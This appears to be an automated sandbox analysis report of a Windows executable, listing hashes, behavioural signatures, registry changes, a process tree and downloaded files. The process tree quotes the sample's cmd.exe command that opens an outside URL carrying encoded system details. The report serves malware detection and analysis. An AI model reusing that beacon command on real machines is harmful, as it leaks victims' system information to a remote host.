Analysis
-
max time kernel
129s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27-11-2022 11:53
Static task
static1
Behavioral task
behavioral1
Sample
330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe
Resource
win10v2004-20220812-en
General
-
Target
330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe
-
Size
143KB
-
MD5
3f0b49449db35d26ccf73c069c1ee589
-
SHA1
106ee20726c8714a9a9db9e87afff50e77cf3507
-
SHA256
330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3
-
SHA512
230a70fcca35a857da2025438b0cc527826cefa67b0a0247407c576bbf3f986db06158a094592b03c0bc5a1e781d54634431d26200846a8c97aa39ca677bd5f8
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45Ds:pe9IB83ID54
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000035445a53ede92243b6f719f71116e8290000000002000000000010660000000100002000000073742479a5dd2d14155ceb76ce1b0fb1d9fb328dc99085c1d9edf1c1d292a2b7000000000e8000000002000020000000be9d7111304588a64fdb4a99215505daf6f88344045cb981e951f2a09a72efea20000000bb814ef9de58f8a41a1fe22f96025f2afc325ffab8cccc482c9f5de94063aeba40000000fd580bc3f3ad343b9bee467dc69f16e2b64f10c116f103b05f7cedd93ee011eeb44c55bbda72a2651c629702874bdd54766d23c6d3f76aaf64cefae0ccf2957b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376393646" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000035445a53ede92243b6f719f71116e8290000000002000000000010660000000100002000000040a16bc32351b6a9bc79b425cf4c0ec1f4eb050f86eba93431f504878af20c56000000000e8000000002000020000000bdb8f2c10b86d650db7782891ffd278dec56573a43167c6eb00fb46752e88cce90000000fb38b3337cd3ec317cc6453ed4d1c770da18b63a3a3ecdc935aea0088317788ada7eadf063d71174440d9b9659ca924fbe9f286f3763b7b1398c858f56682aee859ce43636aa4e78f6427aad137fab769c21974205db60ef14787ed84951f4c906b4049b47dcef8274b56060760c71d996379f8c5088d5a0bfc252e1f524af754b1aded24758f7ef9f4c84fbd62f9aae40000000d5efc8ec9084705a120cb079420b05c8731ba262209101bf028b83dd5b9ecd3c14640a97187659d25c2db7d6f6a76efa903eab66798e2659afc52b141caa8265 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e01307190e03d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4052EBE1-6F01-11ED-B51C-6E705F4A26E5} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1096 330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe 960 iexplore.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1096 330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 960 iexplore.exe 960 iexplore.exe 1512 IEXPLORE.EXE 1512 IEXPLORE.EXE 1512 IEXPLORE.EXE 1512 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1096 wrote to memory of 932 1096 330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe 29 PID 1096 wrote to memory of 932 1096 330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe 29 PID 1096 wrote to memory of 932 1096 330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe 29 PID 1096 wrote to memory of 932 1096 330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe 29 PID 932 wrote to memory of 960 932 cmd.exe 31 PID 932 wrote to memory of 960 932 cmd.exe 31 PID 932 wrote to memory of 960 932 cmd.exe 31 PID 932 wrote to memory of 960 932 cmd.exe 31 PID 960 wrote to memory of 1512 960 iexplore.exe 32 PID 960 wrote to memory of 1512 960 iexplore.exe 32 PID 960 wrote to memory of 1512 960 iexplore.exe 32 PID 960 wrote to memory of 1512 960 iexplore.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe"C:\Users\Admin\AppData\Local\Temp\330f347a53f06c89ca7fd0c6684cb6c78395a0a09875980d58821adf76148ec3.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5301121^&rsn=plde^&details=^|v6.1.7601x64sp1.0ws^|tt35^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://securedfileinfo.com/404.jsp?chid=5301121&rsn=plde&details=|v6.1.7601x64sp1.0ws|tt35|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:960 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1512
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5167cfd90cb81d3dddd63f107249a0f2e
SHA139a78631cc336bb71fe7a02eeb91474bbc335eea
SHA2564c527164ea0096494cfd68b9e9167c0587c162106e8ec71edc705963c9fc543b
SHA512013a16d1dc963bf536a156ccb6ea94596887e1d774d6b18636000bbda06b57c135bac00ef046d18022b8512d6abb9bffd3c26b6d10998b4f0e86b46c319b7911
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize472B
MD503ad9fc0b00b5df3165dc2fb1e3b0a3e
SHA1f8243335a8bc24d989bddd346048a055e1d0bdeb
SHA256366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec
SHA512a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize724B
MD5f569e1d183b84e8078dc456192127536
SHA130c537463eed902925300dd07a87d820a713753f
SHA256287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413
SHA51249553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD59ea88a4ba0e79b48df691a19a8540b69
SHA1796c22db08d464c02bae275c0343baf4318058c1
SHA256a76f1f52a484c72ca3b4a288f0f69b8773179aaa0340fe1a61a5e640f87ce410
SHA512d67ff1fb75fbbc178ddf85c6b06705937b717deba2f04c31aaeb480a707c3f9ef310680f815248c691781fb0c86068c10b986bff24aceb3b0e53f33db63241b2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize402B
MD520d28b44e937200fcfb1006508f50071
SHA1583231af09288298277fd7c1da0e3eb5a6e490d2
SHA256f8396cc7cf650cbb8d69d46a605de933f2f26c10ec822ce9fc80a0e2e768d9d7
SHA512177370868976c7236292c76e3fa909163dc14b8e02c3d98fdfd5be3fc4df11b429ed7e8d648cd26796e110d8528269d93b9c360aca4eda4ed3b5e8d62fbdbd93
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize340B
MD59e86d771f8bb15d9eb810cc866dd375d
SHA10d14dff8d77a2ce6ad670f9eb3d681dd0463cb0c
SHA25680701893567d8aa9860bb16b22969709c519c7b1b4dafde8bee13d20ec08b5c0
SHA512c868903451dc8164594be7ea8982ecff80bee74b8e421a0870d5b1a48a2284b2950737c00cf4a9276d97de9ca1f16df5cc00c81cf33ce42b78b993e337dccec7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize392B
MD56103536e42c4202d417f6a016972f421
SHA1034cf845a543f1786567c912b2bdff5dd7fb0a09
SHA2566815d2bd9c3bb6a17c697a02003c8eb51ab89ac7b08bd5503fd2c9aad0b3de44
SHA512325cd9f32760268b77e95d79567f88d50c9dc3b3bf549cbc0a00d8eb57c5cb210c65db7857d140de1b17773c2b3907079e449ee70abb248473479280094541f4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD56ba38d6e20f1ae20a629ac79d7b05eab
SHA1ed147683d48928b813ccc945e97fd21057088d48
SHA2569ed8709c911ea5d5722c044056a84dc1bf4e7cab145b69165c0d5e3b0c5d9886
SHA512020541987d0584bc7c7a72015048d056d199f2be7cdc6426829acad3ab4093b928629bbf52e7f9c9815d85263a8ab99107763a91b198ed854067f7db5ae1dc9d
-
Filesize
601B
MD583bf7d081565c822588c37f1fd4d9e20
SHA1f54ba68908e7fd76f7bed1fa4d448d9ececa451a
SHA2566150f866281c685307dc7456c55eaf6e4299462350984c3dc44864c0daaffd29
SHA512e2a2cc6020d91ff851b45dd5dac81bb82759f20aed2d20ebf497a518a12a1ebfbbfc19cd918a15d2a71d2c9425e6f287605c6216f22efafaa066768e71ccd0d7